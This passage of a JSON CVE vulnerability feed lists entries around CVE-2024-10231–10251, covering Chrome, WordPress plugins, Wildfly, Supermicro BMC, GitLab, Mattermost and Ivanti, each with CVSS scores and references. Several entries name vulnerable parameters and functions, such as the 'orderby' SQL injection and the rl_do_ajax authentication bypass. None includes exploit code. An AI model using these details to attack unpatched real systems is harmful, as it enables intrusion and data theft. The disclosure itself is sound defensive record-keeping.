crafted HTML page. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "130.0.6723.69", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-22T22:15Z", "lastModifiedDate" : "2024-10-31T08:35Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10231", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-843" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/10/stable-channel-update-for-desktop_22.html", "name" : "https://chromereleases.googleblog.com/2024/10/stable-channel-update-for-desktop_22.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://issues.chromium.org/issues/372269618", "name" : "https://issues.chromium.org/issues/372269618", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Type Confusion in V8 in Google Chrome prior to 130.0.6723.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "130.0.6723.69", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-22T22:15Z", "lastModifiedDate" : "2024-10-25T17:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10232", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c10993bd-b4f3-44b6-bb0f-cb783dbcf314?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c10993bd-b4f3-44b6-bb0f-cb783dbcf314?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/atomchat/#developers", "name" : "https://wordpress.org/plugins/atomchat/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3178522/", "name" : "https://plugins.trac.wordpress.org/changeset/3178522/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Group Chat & Video Chat by AtomChat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's atomchat shortcode in all versions up to, and including, 1.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-01T10:15Z", "lastModifiedDate" : "2024-11-01T12:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10233", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c923d1d6-04c6-4ea2-a69e-041fea1e280a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c923d1d6-04c6-4ea2-a69e-041fea1e280a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/sms-alert/#developers", "name" : "https://wordpress.org/plugins/sms-alert/#developers", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3175629/", "name" : "https://plugins.trac.wordpress.org/changeset/3175629/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The SMS Alert Order Notifications – WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sa_subscribe shortcode in all versions up to, and including, 3.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cozyvision:sms_alert_order_notifications:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "3.7.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-29T11:15Z", "lastModifiedDate" : "2025-05-28T21:04Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10234", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2025:10924", "name" : "RHSA-2025:10924", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:10925", "name" : "RHSA-2025:10925", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:10926", "name" : "RHSA-2025:10926", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:10931", "name" : "RHSA-2025:10931", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:11636", "name" : "RHSA-2025:11636", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:11638", "name" : "RHSA-2025:11638", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:11639", "name" : "RHSA-2025:11639", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:11640", "name" : "RHSA-2025:11640", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:11645", "name" : "RHSA-2025:11645", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:2025", "name" : "RHSA-2025:2025", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:2026", "name" : "RHSA-2025:2026", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2025:2029", "name" : "RHSA-2025:2029", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-10234", "name" : "https://access.redhat.com/security/cve/CVE-2024-10234", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2320848", "name" : "RHBZ#2320848", "refsource" : "", "tags" : [ "Issue Tracking" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Wildfly, where a user may perform Cross-site scripting in the Wildfly deployment system. This flaw allows an attacker or insider to execute a deployment with a malicious payload, which could trigger undesired behavior against the server." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:jboss_enterprise_application_platform:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.3, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.1, "impactScore" : 5.2 } }, "publishedDate" : "2024-10-22T14:15Z", "lastModifiedDate" : "2025-07-23T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10237", "ASSIGNER" : "secure@supermicro.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.supermicro.com/en/support/security_BMC_IPMI_Jan_2025", "name" : "https://www.supermicro.com/en/support/security_BMC_IPMI_Jan_2025", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "There is a vulnerability in the BMC firmware image authentication design \n\n at Supermicro MBD-X12DPG-OA6\n\n. An attacker can modify the firmware to bypass BMC inspection and bypass the signature verification process" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-04T08:15Z", "lastModifiedDate" : "2025-02-04T08:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10238", "ASSIGNER" : "secure@supermicro.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.supermicro.com/en/support/security_BMC_IPMI_Jan_2025", "name" : "https://www.supermicro.com/en/support/security_BMC_IPMI_Jan_2025", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A security issue in the firmware image verification implementation \n\n at Supermicro MBD-X12DPG-OA6. An attacker can upload a specially crafted image that will cause a stack overflow is caused by not checking fld->used_bytes." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-04T08:15Z", "lastModifiedDate" : "2025-02-04T08:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10239", "ASSIGNER" : "secure@supermicro.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.supermicro.com/en/support/security_BMC_IPMI_Jan_2025", "name" : "https://www.supermicro.com/en/support/security_BMC_IPMI_Jan_2025", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A security issue in the firmware image verification implementation at Supermicro MBD-X12DPG-OA6 . An attacker with administrator privileges can upload a specially crafted image, which can cause a stack overflow due to the unchecked fat->fsd.max_fld." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-04T08:15Z", "lastModifiedDate" : "2025-02-04T08:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1024", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252292", "name" : "https://vuldb.com/?ctiid.252292", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252292", "name" : "https://vuldb.com/?id.252292", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252292", "name" : "https://vuldb.com/?ctiid.252292", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252292", "name" : "https://vuldb.com/?id.252292", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in SourceCodester Facebook News Feed Like 1.0 and classified as problematic. This vulnerability affects unknown code of the component New Account Handler. The manipulation of the argument First Name/Last Name with the input leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252292." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:facebook_news_feed_like:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-30T01:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10240", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://about.gitlab.com/releases/2024/11/13/patch-release-gitlab-17-5-2-released/#information-disclosure-through-an-api-endpoint", "name" : "https://about.gitlab.com/releases/2024/11/13/patch-release-gitlab-17-5-2-released/#information-disclosure-through-an-api-endpoint", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/493188", "name" : "GitLab Issue #493188", "refsource" : "", "tags" : [ "Broken Link" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An issue has been discovered in GitLab EE affecting all versions starting from 17.3 before 17.3.7, all versions starting from 17.4 before 17.4.4, all versions starting from 17.5 before 17.5.2 in which an unauthenticated user may be able to read some information about an MR in a private project, under certain circumstances." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "17.5.0", "versionEndExcluding" : "17.5.2", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "17.5.0", "versionEndExcluding" : "17.5.2", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "17.4.0", "versionEndExcluding" : "17.4.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "17.4.0", "versionEndExcluding" : "17.4.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "17.3.0", "versionEndExcluding" : "17.3.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "17.3.0", "versionEndExcluding" : "17.3.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-11-26T20:15Z", "lastModifiedDate" : "2024-12-13T01:37Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10241", "ASSIGNER" : "responsibledisclosure@mattermost.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mattermost.com/security-updates", "name" : "https://mattermost.com/security-updates", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Mattermost versions 9.5.x <= 9.5.9 fail to properly filter the channel data when ElasticSearch is enabled which allows a user to get private channel names by using cmd+K/ctrl+K." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-29T08:15Z", "lastModifiedDate" : "2024-10-29T14:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10243", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-07-05T23:15Z", "lastModifiedDate" : "2025-07-05T23:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10244", "ASSIGNER" : "cve@usom.gov.tr" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.usom.gov.tr/bildirim/tr-24-1893", "name" : "https://www.usom.gov.tr/bildirim/tr-24-1893", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ISDO Software Web Software allows SQL Injection.This issue affects Web Software: before 3.6." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-12-19T14:15Z", "lastModifiedDate" : "2024-12-19T14:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10245", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/relais-2fa/trunk/relais.php?rev=2439540#L39", "name" : "https://plugins.trac.wordpress.org/browser/relais-2fa/trunk/relais.php?rev=2439540#L39", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d476336-e997-4379-a8f6-963ae22b2417?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d476336-e997-4379-a8f6-963ae22b2417?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Relais 2FA plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0. This is due to incorrect authentication and capability checking in the 'rl_do_ajax' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-12T10:15Z", "lastModifiedDate" : "2024-11-12T13:55Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10247", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/179387/WordPress-Video-Gallery-YouTube-Gallery-And-Vimeo-Gallery-2.3.6-SQL-Injection.html", "name" : "https://packetstormsecurity.com/files/179387/WordPress-Video-Gallery-YouTube-Gallery-And-Vimeo-Gallery-2.3.6-SQL-Injection.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/gallery-videos/trunk/admin/class-tsvg-list.php#L15", "name" : "https://plugins.trac.wordpress.org/browser/gallery-videos/trunk/admin/class-tsvg-list.php#L15", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3200979/gallery-videos/trunk/admin/class-tsvg-list.php", "name" : "https://plugins.trac.wordpress.org/changeset/3200979/gallery-videos/trunk/admin/class-tsvg-list.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f5524582-5aac-48b4-ad67-7c4829d63ed0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f5524582-5aac-48b4-ad67-7c4829d63ed0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Video Gallery – Best WordPress YouTube Gallery Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the orderby parameter in all versions up to, and including, 2.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:total-soft:video_gallery:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.4.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.9, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.2, "impactScore" : 3.6 } }, "publishedDate" : "2024-12-06T04:15Z", "lastModifiedDate" : "2025-07-09T12:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10249", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-11T02:15Z", "lastModifiedDate" : "2025-02-11T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10250", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e13c6d97-873a-4067-846d-92e54514645d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e13c6d97-873a-4067-846d-92e54514645d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://themeforest.net/item/nioland-saas-software-startup-tech-wordpress-theme/47895474#item-description__change-log", "name" : "https://themeforest.net/item/nioland-saas-software-startup-tech-wordpress-theme/47895474#item-description__change-log", "refsource" : "", "tags" : [ "Release Notes" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Nioland theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘s’ parameter in all versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:steelthemes:nioland:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.2.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-23T14:15Z", "lastModifiedDate" : "2024-10-25T16:37Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10251", "ASSIGNER" : "responsible.disclosure@ivanti.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-276" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Security-Controls-iSec-CVE-2024-10251", "name" : "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Security-Controls-iSec-CVE-2024-10251", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Under specific circumstances, insecure permissions in Ivanti Security Controls before version 2024.4.1 allows a local authenticated attacker to achieve local privilege escalation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:security_controls:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2024.4.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : 